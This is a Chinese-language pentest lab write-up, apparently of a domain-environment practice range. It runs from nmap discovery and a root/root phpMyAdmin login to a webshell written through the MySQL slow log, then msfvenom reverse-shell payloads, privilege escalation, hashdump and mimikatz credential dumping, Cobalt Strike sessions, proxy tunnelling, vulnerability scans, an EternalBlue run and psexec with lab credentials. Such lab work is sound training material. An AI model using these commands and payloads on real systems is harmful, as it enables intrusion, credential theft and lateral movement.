说明:关于该复现中的问题欢迎vx交流:Bestboysendit
目录
一、环境配置:
二、内网getshell
3-(1)phpmyadmin
3-(2)备份文件:
三、内网-连接
1、基于MSF
2、基于Cobalt Strike
3、CS与kali联动
(1)CS下的会话传给MSF
(2)MSF下的会话传给CS
四、内网-横向
4.1 搭建隧道
4.1.1 使用CS搭建隧道
4.1.2 使用msf搭建隧道
4.2内网信息收集
五、内网攻击
1、MS08-067
2、SMB远程桌面口令猜测
3、RPC DCOM 服务漏洞
4、ms17-010
psexec攻击
域hash传递攻击
一、环境配置:
2008:10.10.10.3 域控主机
win7:10.10.10.2 host-only+nat 192.168.3.11
2k3:10.10.10.4 域控客户端
kali:192.168.3.136
win7开启phpstudy,下载的靶机桌面上没有快捷方式,用everything搜索一下。
二、内网getshell
1、nmap开启扫描:
经排查144的地址为所需地址,且80端口是开启的
nmap 192.168.3.0/24
Starting Nmap 7.91 ( https://nmap.org ) at 2021-08-25 09:01 EDT
Nmap scan report for 192.168.3.144
Host is up (0.010s latency).
Not shown: 989 closed ports
PORT STATE SERVICE
80/tcp open http
135/tcp open msrpc
139/tcp open netbios-ssn
445/tcp open microsoft-ds
1025/tcp open NFS-or-IIS
1026/tcp open LSA-or-nterm
1027/tcp open IIS
1028/tcp open unknown
1029/tcp open ms-lsa
1030/tcp open iad1
3306/tcp open mysql
Nmap done: 256 IP addresses (4 hosts up) scanned in 4.73 seconds
2、访问192.168.3.144的80端口:
phpinfo() 页面,且留有绝对路径,管理邮箱:
猜密码:root/root 弱口令
尝试使用file_into或日志写入webshell。
secure_file_priv的值为“空”时允许任意文件写入,为“null”时不允许任何写入。该值也可以为路径;
show global variables like "%secure%";
这里行不通:
3、御剑扫描后台:
3-(1)phpmyadmin
可以登录:root/root
以下命令都是通过phpmyadmin界面执行
尝试通过慢日志写入shell:
①查询慢日志超时时间:10s
②set global slow_query_log = 1; 开启可更改
③set global slow_query_log_file = “c:\phpstudy\WWW\shell.php”;
修改日志的地址,
确认修改情况:
④注入:
select '<?php phpinfo(); ?>;' or sleep(11);
⑤写入成功:
⑥写入一句话:
select '<?php eval($_POST[12]) ?>' or sleep(11);
⑦菜刀连接:
3-(2)备份文件:
备份显示为:yxcms系统
①访问:
②在留言板中插入xss测试代码
③进入后台审核:
④模板文件是php文件,直接添加木马
⑤文件路径:…要根据之前所给的beifen.rar来确定位置:
思路:看一下与写入的shell.php模板文件在一起的其他文件名,然后去beifen.rar查找位置:
⑥连接:
三、内网-连接
1、基于MSF
01使用msfvenom生成payload文件
地址:kali地址,端口,随便写一个不冲突的
msf6 > msfvenom -p windows/meterpreter_reverse_tcp lhost=192.168.3.136 lport=1234 -f exe -o eye2.exe
[*] exec: msfvenom -p php/meterpreter/reverse_tcp lhost=192.168.3.144 lport=6666 -f raw > eye.php
[-] No platform was selected, choosing Msf::Module::Platform::PHP from the payload
[-] No arch selected, selecting arch: php from the payload
No encoder specified, outputting raw payload
Payload size: 1114 bytes
msf6 > ls
[*] exec: ls
arget ctf Documents eye2.exe Pictures Templates
asd.exe Desktop Downloads Music Public Videos
msf6 >
msf6 > pwd
[*] exec: pwd
/home/buna
msf6 >
02使用菜刀上传
到www目录下
03使用handler模块接收反弹模块,在1234端口上进行监听,访问shell.php,连接成功
下面地址也应该是kali的地址
04上线:
05提权:
这里直接是administrator,所有可以直接提到system,
meterpreter > getuid
Server username: GOD\Administrator
meterpreter >
meterpreter >
meterpreter > getsystem
...got system via technique 1 (Named Pipe Impersonation (In Memory/Admin)).
meterpreter >
meterpreter > getuid
Server username: NT AUTH
ORITY\SYSTEM
meterpreter >
06获取密码:
Windows系统下的hash密码格式为:
用户名称:RID:LM-HASH值:NT-HASH值
NT-HASH hash生产方式:
- 将明文口令转换成十六进制的格式
- 转换成Unicode格式,即在每个字节之后添加0x00
- 对Unicode字符串作MD4加密,生成32位的十六进制数字串
eg:用户密码为test123
转换成十六进制的格式为74657374313233
转换成Unicode格式为7400650073007400310032003300
对字符串7400650073007400310032003300作MD4加密,结果为c5a237b7e9d8e708d8436b6148a25fa1
meterpreter > run hashdump
[!] Meterpreter scripts are deprecated. Try post/windows/gather/smart_hashdump.
[!] Example: run post/windows/gather/smart_hashdump OPTION=value [...]
[*] Obtaining the boot key...
[*] Calculating the hboot key using SYSKEY fd4639f4e27c79683ae9fee56b44393f...
[*] Obtaining the user list and keys...
[*] Decrypting user keys...
[*] Dumping password hints...
No users with password hints on this system
[*] Dumping password hashes...
Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
liukaifeng01:1000:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
meterpreter >
04mimikatz
加载 mimikatz 模块,加载模块前需要先将meterpreter迁移到64位的进程,该进程也需要是system权限:
ps
migrate PID
load mimikatz
mimikatz_command -f sekurlsa::searchPasswords
meterpreter > load mimikatz
[!] The "mimikatz" extension has been replaced by "kiwi". Please use this in future.
Loading extension kiwi...
.#####. mimikatz 2.2.0 20191125 (x86/windows)
.## ^ ##. "A La Vie, A L'Amour" - (oe.eo)
## / \ ## /*** Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com )
## \ / ## > http://blog.gentilkiwi.com/mimikatz
'## v ##' Vincent LE TOUX ( vincent.letoux@gmail.com )
'#####' > http://pingcastle.com / http://mysmartlogon.com ***/
[!] Loaded x86 Kiwi on an x64 architecture.
Success.
meterpreter >
05 kiwi
load wiki
creds_all
这里不是很成功。。
11、远程桌面链接
06开启远程桌面:
run post/windows/manage/enable_rdp
07连接:
2、基于Cobalt Strike
给服务端程序执行权限
执行cs服务端程序,开启服务,ip是kali的ip,密码是123
重新打开一个终端,在kali上执行cs客户端程序,用户名随意,密码123
创建一个监听器,ip就是kali的ip
生成生成Web Delivery
选择刚刚创建的那个Listener
会生成一条命令,使用菜刀连接webshell,打开虚拟终端,输入这条命令
目标主机就上线了,你就可以使用cs对它进行操作啦
比如屏幕截图,右击连接->Explore->Screenshot,再点击上面的图片小图片进入屏幕截图视图(点击View-Screenshot也行),就能看到目标的屏幕截图了
收集信息:
使用 hashdump 和 logonpasswords 读内存和注册表密码,在 Credentials 模块下查看
2、使用mimikatz.exe程序
mimikatz.exe “privilege::debug” “log” “sekurlsa::logonpasswords” exit
11、远程桌面链接
略
3、CS与kali联动
(1)CS下的会话传给MSF
使用msf监听模块,ip就是kali的ip,端口就是监听的端口,payload要和cs相同,然后运行,开始监听
①首先cobaltstrike创建监听器:
②在msf控制台执行如下操作:
use exploit/windows/local/payload_inject
set payload windows/meterpreter/reverse_http
set DisablePayloadHandler true #payload_inject执行之后会在本地产生一个新的handler,设置为true表示不重复生成
set lhost xxxx #公网vps ip
set lport 14444 #监听端口
set session 1 #派发session id
exploit
③得到shell:
点击要连接的会话->Spawn->选择上面的监听
(2)MSF下的会话传给CS
首先cobaltstrike创建监听器:
msf:
use exploit/windows/local/payload_inject
set payload windows/meterpreter/reverse_http
set DisablePayloadHandler true #payload_inject执行之后会在本地产生一个新的handler,设置为true表示不重复生成
set lhost xxxx #公网vps ip
set lport 14444 #监听端口
set session 1 #派发session id
exploit
四、内网-横向
4.1 搭建隧道
4.1.1 使用CS搭建隧道
前提是仅通过CS拿到会话或者MSF拿到会话派送给CS
cs配置:
打开会话,输入socks 1234
进入代理视图,选中会话点击Tunnel,复制生成的文字
msf配置:
粘贴cs生成的命令 setg Proxies socks4:127.0.0.1:1234
setg ReverseAllowProxy true 允许反向代理
修改/etc/proxychains.conf文件
4.1.2 使用msf搭建隧道
该部分可直接跳过到4.2部分,因为这里失败了
横向渗透前,先将该web服务器配置为代理服务器当作跳板机。
msf+proxychains
可用msf直接搭建sock隧道:
进入session,自动创建路由:
run post/multi/manage/autoroute
meterpreter > run post/multi/manage/autoroute
[!] SESSION may not be compatible with this module.
[*] Running module against STU1
[*] Searching for subnets to autoroute.
[+] Route added to subnet 10.10.10.0/255.255.255.0 from host's routing table.
[+] Route added to subnet 169.254.0.0/255.255.0.0 from host's routing table.
[+] Route added to subnet 192.168.3.0/255.255.255.0 from host's routing table.
meterpreter >
查看路由:
run autoroute -p
meterpreter > run autoroute -p
[!] Meterpreter scripts are deprecated. Try post/multi/manage/autoroute.
[!] Example: run post/multi/manage/autoroute OPTION=value [...]
Active Routing Table
====================
Subnet Netmask Gateway
------ ------- -------
10.10.10.0 255.255.255.0 Session 2
169.254.0.0 255.255.0.0 Session 2
192.168.3.0 255.255.255.0 Session 2
meterpreter >
退到上层,使用socks4a进行代理,端口与proxychains里设置一致即可:
因为kali2021没有sock4a选项,故停止继续
background
use auxiliary/server/socks4a
run
在这里插入图片描述
run后 可用jobs查看任务是否执行:
jobs
在这里插入图片
配置proxychains:
vi /etc/proxychains.conf
在这里插入图片描述
全局代理测试:
在这里插入图片描述
浏览器代理测试:
在这里插入图片描述
cobaltstrike + proxifer
cs开启socks代理:
在这里插入图片描述
自定义端口:
在这里插入图片描述
proxifer设置:
在这里插入图片描述
测试:
在这里插入图片描述
4.2内网信息收集
该部分承接4.1.1
使用msf的扫描模块扫描内网主机
使用msf内置模块进行存活主机探测
auxiliary/scanner/discovery/udp_sweep #基于udp协议发现内网存活主机
auxiliary/scanner/discovery/udp_probe #基于udp协议发现内网存活主机
auxiliary/scanner/netbios/nbname #基于netbios协议发现内网存活主机
内网主机端口扫描
proxychains nmap -Pn -sT 172.20.10.10
auxiliary/scanner/portscan/tcp #基于tcp进行端口扫描(默认扫描1-10000)
内网主机服务探测
auxiliary/scanner/ftp/ftp_version #发现内网ftp服务,基于默认21端口
auxiliary/scanner/ssh/ssh_version #发现内网ssh服务,基于默认22端口
auxiliary/scanner/telnet/telnet_version #发现内网telnet服务,基于默认23端口
auxiliary/scanner/dns/dns_amp #发现dns服务,基于默认53端口
auxiliary/scanner/http/http_version #发现内网http服务,基于默认80端口
auxiliary/scanner/http/title #探测内网http服务的标题
auxiliary/scanner/smb/smb_version #发现内网smb服务,基于默认的445端口
auxiliary/scanner/mssql/mssql_schemadump #发现内网SQLServer服务,基于默认的1433端口
auxiliary/scanner/oracle/oracle_hashdump #发现内网oracle服务,基于默认的1521端口
auxiliary/scanner/mysql/mysql_version #发现内网mysql服务,基于默认3306端口
auxiliary/scanner/rdp/rdp_scanner #发现内网RDP服务,基于默认3389端口
auxiliary/scanner/redis/redis_server #发现内网Redis服务,基于默认6379端口
auxiliary/scanner/db2/db2_version #探测内网的db2服务,基于默认的50000端口
auxiliary/scanner/netbios/nbname #探测内网主机的netbios名字
下面内容部分因为需要msf的会话,没有复现。环境中内网网段为10.10.10.0 案例中给的192.168.52.0
补丁信息:
安装软件信息
路由信息
添加路由,使得 MSF 能够通过 Win7 路由转发访问192.168.52.0 网段
arp扫描52网段
关闭防火墙,再使用nmap扫描
netsh advfirewall set allprofiles state off
扫描太慢,,,直接借图:
使用nmap的vuln漏洞扫描脚本进行扫描
Nmap scan report for 10.10.10.2
Host is up (0.00067s latency).
Not shown: 989 filtered ports
PORT STATE SERVICE
80/tcp open http
| http-csrf:
| Spidering limited to: maxdepth=3; maxpagecount=20; withinhost=10.10.10.2
| Found the following possible CSRF vulnerabilities:
|
| Path: http://10.10.10.2:80/
| Form id:
| Form action: /l.php#bottom
|
| Path: http://10.10.10.2:80/l.php
| Form id:
|_ Form action: /l.php#bottom
|_http-dombased-xss: Couldn't find any DOM based XSS.
| http-enum:
| /phpinfo.php: Possible information file
| /phpmyadmin/: phpMyAdmin
| /phpMyAdmin/: phpMyAdmin
|_ /PHPMyAdmin/: phpMyAdmin
| http-phpself-xss:
| VULNERABLE:
| Unsafe use of $_SERVER["PHP_SELF"] in PHP files
| State: VULNERABLE (Exploitable)
| PHP files are not handling safely the variable $_SERVER["PHP_SELF"] causing Reflected Cross Site Scripting vulnerabilities.
|
| Extra information:
|
| Vulnerable files with proof of concept:
| http://10.10.10.2/l.php/%27%22/%3E%3Cscript%3Ealert(1)%3C/script%3E
| Spidering limited to: maxdepth=3; maxpagecount=20; withinhost=10.10.10.2
| References:
| https://www.owasp.org/index.php/Cross-site_Scripting_(XSS)
|_ http://php.net/manual/en/reserved.variables.server.php
| http-sql-injection:
| Possible sqli for queries:
| http://10.10.10.2:80/l.php?act=Function%27%20OR%20sqlspider
| http://10.10.10.2:80/l.php?act=phpinfo%27%20OR%20sqlspider
| http://10.10.10.2:80/l.php?act=Function%27%20OR%20sqlspider
| http://10.10.10.2:80/l.php?act=phpinfo%27%20OR%20sqlspider
| http://10.10.10.2:80/l.php?=PHPE9568F35-D428-11d2-A769-00AA001ACF42%27%20OR%20sqlspider
| http://10.10.10.2:80/l.php?=PHPE9568F34-D428-11d2-A769-00AA001ACF42%27%20OR%20sqlspider
| http://10.10.10.2:80/l.php?=PHPB8B5F2A0-3C92-11d3-A3A9-4C7B08C10000%27%20OR%20sqlspider
| Possible sqli for forms:
| Form at path: /, form's action: /l.php#bottom. Fields that might be vulnerable:
| host
| port
| login
| funName
| Form at path: /l.php, form's action: /l.php#bottom. Fields that might be vulnerable:
| host
| port
| login
|_ funName
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
|_http-trace: TRACE is enabled
135/tcp open msrpc
139/tcp open netbios-ssn
445/tcp open microsoft-ds
1025/tcp open NFS-or-IIS
1026/tcp open LSA-or-nterm
1027/tcp open IIS
1029/tcp open ms-lsa
1030/tcp open iad1
3306/tcp open mysql
|_mysql-vuln-cve2012-2122: ERROR: Script execution failed (use -d to debug)
|_sslv2-drown:
3389/tcp open ms-wbt-server
| rdp-vuln-ms12-020:
| VULNERABLE:
| MS12-020 Remote Desktop Protocol Denial Of Service Vulnerability
| State: VULNERABLE
| IDs: CVE:CVE-2012-0152
| Risk factor: Medium CVSSv2: 4.3 (MEDIUM) (AV:N/AC:M/Au:N/C:N/I:N/A:P)
| Remote Desktop Protocol vulnerability that could allow remote attackers to cause a denial of service.
|
| Disclosure date: 2012-03-13
| References:
| http://technet.microsoft.com/en-us/security/bulletin/ms12-020
| https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-0152
|
| MS12-020 Remote Desktop Protocol Remote Code Execution Vulnerability
| State: VULNERABLE
| IDs: CVE:CVE-2012-0002
| Risk factor: High CVSSv2: 9.3 (HIGH) (AV:N/AC:M/Au:N/C:C/I:C/A:C)
| Remote Desktop Protocol vulnerability that could allow remote attackers to execute arbitrary code on the targeted system.
|
| Disclosure date: 2012-03-13
| References:
| http://technet.microsoft.com/en-us/security/bulletin/ms12-020
|_ https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-0002
|_ssl-ccs-injection: No reply from server (TIMEOUT)
|_sslv2-drown:
Host script results:
|_samba-vuln-cve-2012-1182: NT_STATUS_ACCESS_DENIED
|_smb-vuln-ms10-054: false
|_smb-vuln-ms10-061: SMB: Failed to receive bytes: TIMEOUT
Nmap done: 1 IP address (1 host up) scanned in 140.66 seconds
使用msf辅助模块进行扫描,查看是否存在ms17-010漏洞
在cs上使用目标机器上的nmap,对内网其他主机进行扫描
注:有时beacon连接会执行不了命令,或者连接断开,或者制作不了scripted web delivery这时要重启一下cs服务器。
主机10.10.10.4信息
beacon> shell nmap --script=vuln 10.10.10.4
[*] Tasked beacon to run: nmap --script=vuln 10.10.10.4
[+] host called home, sent: 60 bytes
[+] received output:
Starting Nmap 7.80 ( https://nmap.org ) at 2021-08-28 11:30 ?D1ú±ê×?ê±??
[+] received output:
Nmap scan report for 10.10.10.4
Host is up (0.00s latency).
Not shown: 987 closed ports
PORT STATE SERVICE
21/tcp open ftp
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
|_sslv2-drown:
135/tcp open msrpc
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
139/tcp open netbios-ssn
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
445/tcp open microsoft-ds
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
777/tcp open multiling-http
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
1025/tcp open NFS-or-IIS
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
1026/tcp open LSA-or-nterm
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
1038/tcp open mtqp
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
1044/tcp open dcutility
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
6002/tcp open X11:2
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
7001/tcp open afs3-callback
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
7002/tcp open afs3-prserver
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
8099/tcp open unknown
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
MAC Address: 00:0C:29:11:06:63 (VMware)
Host script results:
| smb-vuln-ms08-067:
| VULNERABLE:
| Microsoft Windows system vulnerable to remote code execution (MS08-067)
| State: VULNERABLE
| IDs: CVE:CVE-2008-4250
| The Server service in Microsoft Windows 2000 SP4, XP SP2 and SP3, Server 2003 SP1 and SP2,
| Vista Gold and SP1, Server 2008, and 7 Pre-Beta allows remote attackers to execute arbitrary
| code via a crafted RPC request that triggers the overflow during path canonicalization.
|
| Disclosure date: 2008-10-23
| References:
| https://technet.microsoft.com/en-us/library/security/ms08-067.aspx
|_ https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-4250
|_smb-vuln-ms10-054: false
|_smb-vuln-ms10-061: NT_STATUS_OBJECT_NAME_NOT_FOUND
| smb-vuln-ms17-010:
| VULNERABLE:
| Remote Code Execution vulnerability in Microsoft SMBv1 servers (ms17-010)
| State: VULNERABLE
| IDs: CVE:CVE-2017-0143
| Risk factor: HIGH
| A critical remote code execution vulnerability exists in Microsoft SMBv1
| servers (ms17-010).
|
| Disclosure date: 2017-03-14
| References:
| https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0143
| https://blogs.technet.microsoft.com/msrc/2017/05/12/customer-guidance-for-wannacrypt-attacks/
|_ https://technet.microsoft.com/en-us/library/security/ms17-010.aspx
Nmap done: 1 IP address (1 host up) scanned in 127.98 seconds
主机10.10.10.3信息
msf6 > nmap --script=vuln 10.10.10.3
[*] exec: nmap --script=vuln 10.10.10.3
Starting Nmap 7.91 ( https://nmap.org ) at 2021-08-27 23:30 EDT
Nmap scan report for 10.10.10.3
Host is up (0.0011s latency).
Not shown: 985 filtered ports
PORT STATE SERVICE
53/tcp open domain
80/tcp open http
|_http-aspnet-debug: ERROR: Script execution failed (use -d to debug)
|_http-csrf: Couldn't find any CSRF vulnerabilities.
|_http-dombased-xss: Couldn't find any DOM based XSS.
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
|_http-vuln-cve2014-3704: ERROR: Script execution failed (use -d to debug)
88/tcp open kerberos-sec
135/tcp open msrpc
139/tcp open netbios-ssn
445/tcp open microsoft-ds
464/tcp open kpasswd5
593/tcp open http-rpc-epmap
636/tcp open ldapssl
|_sslv2-drown:
3268/tcp open globalcatLDAP
3269/tcp open globalcatLDAPssl
|_sslv2-drown:
49154/tcp open unknown
49155/tcp open unknown
49157/tcp open unknown
49158/tcp open unknown
Host script results:
|_samba-vuln-cve-2012-1182: Could not negotiate a connection:SMB: Failed to receive bytes: EOF
| smb-vuln-cve2009-3103:
| VULNERABLE:
| SMBv2 exploit (CVE-2009-3103, Microsoft Security Advisory 975497)
| State: VULNERABLE
| IDs: CVE:CVE-2009-3103
| Array index error in the SMBv2 protocol implementation in srv2.sys in Microsoft Windows Vista Gold, SP1, and SP2,
| Windows Server 2008 Gold and SP2, and Windows 7 RC allows remote attackers to execute arbitrary code or cause a
| denial of service (system crash) via an & (ampersand) character in a Process ID High header field in a NEGOTIATE
| PROTOCOL REQUEST packet, which triggers an attempted dereference of an out-of-bounds memory location,
| aka "SMBv2 Negotiation Vulnerability."
|
| Disclosure date: 2009-09-08
| References:
| https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-3103
|_ http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-3103
|_smb-vuln-ms10-054: false
|_smb-vuln-ms10-061: Could not negotiate a connection:SMB: Failed to receive bytes: EOF
Nmap done: 1 IP address (1 host up) scanned in 62.75 seconds
五、内网攻击
1、MS08-067
使用cs将msf带入内网后,使用ms08-067攻击模块攻击内网主机,注意使用的是反向代理,所以这里payload需要使用正向
搞不进去,,,
2、SMB远程桌面口令猜测
使用msf的smb口令猜测模块,配置参数用于smb口令爆破
3、RPC DCOM 服务漏洞
漏洞原理:
微软修改 dcerpc 框架后形成自己的 RPC 框架来处理进程间的通信。微软的 RPC 框架在处理 TCP/IP 信息交换过程中存在的畸形消息时,未正确处理,导致缓冲区溢出漏洞;
此漏洞影响使用 RPC 框架的 DCOM 接口,DCOM 接口用来处理客户端机器发送给服务器的 DCOM 对象激活请求,如 UNC 路径
漏洞利用:
4、ms17-010
```handlebars
msf6 > use exploit/windows/smb/ms17_010_eternalblue
[*] No payload configured, defaulting to windows/x64/meterpreter/reverse_tcp
msf6 exploit(windows/smb/ms17_010_eternalblue) > set rhosts 10.10.10.4
rhosts => 10.10.10.4
msf6 exploit(windows/smb/ms17_010_eternalblue) > set payload windows/x64/meterpreter/bind_tcp
payload => windows/x64/meterpreter/bind_tcp
msf6 exploit(windows/smb/ms17_010_eternalblue) > show options
Module options (exploit/windows/smb/ms17_010_eternalblue):
Name Current Setting Required Description
---- --------------- -------- -----------
RHOSTS 10.10.10.4 yes The target host(s), range CIDR identifier, or hosts file with syntax 'file:<pat h>'
RPORT 445 yes The target port (TCP)
SMBDomain . no (Optional) The Windows domain to use for authentication
SMBPass no (Optional) The password for the specified username
SMBUser no (Optional) The username to authenticate as
VERIFY_ARCH true yes Check if remote architecture matches exploit Target.
VERIFY_TARGET true yes Check if remote OS matches exploit Target.
Payload options (windows/x64/meterpreter/bind_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
EXITFUNC thread yes Exit technique (Accepted
: '', seh, thread, process, none)
LPORT 4444 yes The listen port
RHOST 10.10.10.4 no The target address
Exploit target:
Id Name
-- ----
0 Windows 7 and Server 2008 R2 (x64) All Service Packs
msf6 exploit(windows/smb/ms17_010_eternalblue) > run
关掉防火墙才可以拿到会话:
5、psexec攻击
内网中,最总要的还是域管理员账号,有了域管理员账号后,可以使用该域管理员账号密码利用 psexec 登录域内任何一台开启了admin$共享(该共享默认开启) 的主机。
下载地址:
pstools:https://download.sysinternals.com/files/PSTools.zip
psexec.exe \10.10.10.4 -u god\administrator -p hongrisec@2019 cmd
这里没开启
PS F:\security\内网\PSTools> .\PsExec.exe \\10.10.10.4 -u god\administrator -p hongrisec@2018 cmd
PsExec v2.34 - Execute processes remotely
Copyright (C) 2001-2021 Mark Russinovich
Sysinternals - www.sysinternals.com
Couldn't access 10.10.10.4:
找不到网络路径。
Make sure that the default admin$ share is enabled on 10.10.10.4.
PS F:\侠之大者,为国为民\内网\PSTools>
六、总结:
1、整体比较简单,漏洞都可以用工具扫出来,只要工具用的到位!
2、可以作为整体流程演示:从外网发现漏洞——getshell——拿到会话——内网信息收集——内网攻击的流程都有!
3、msf+cs=yyds
3008
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
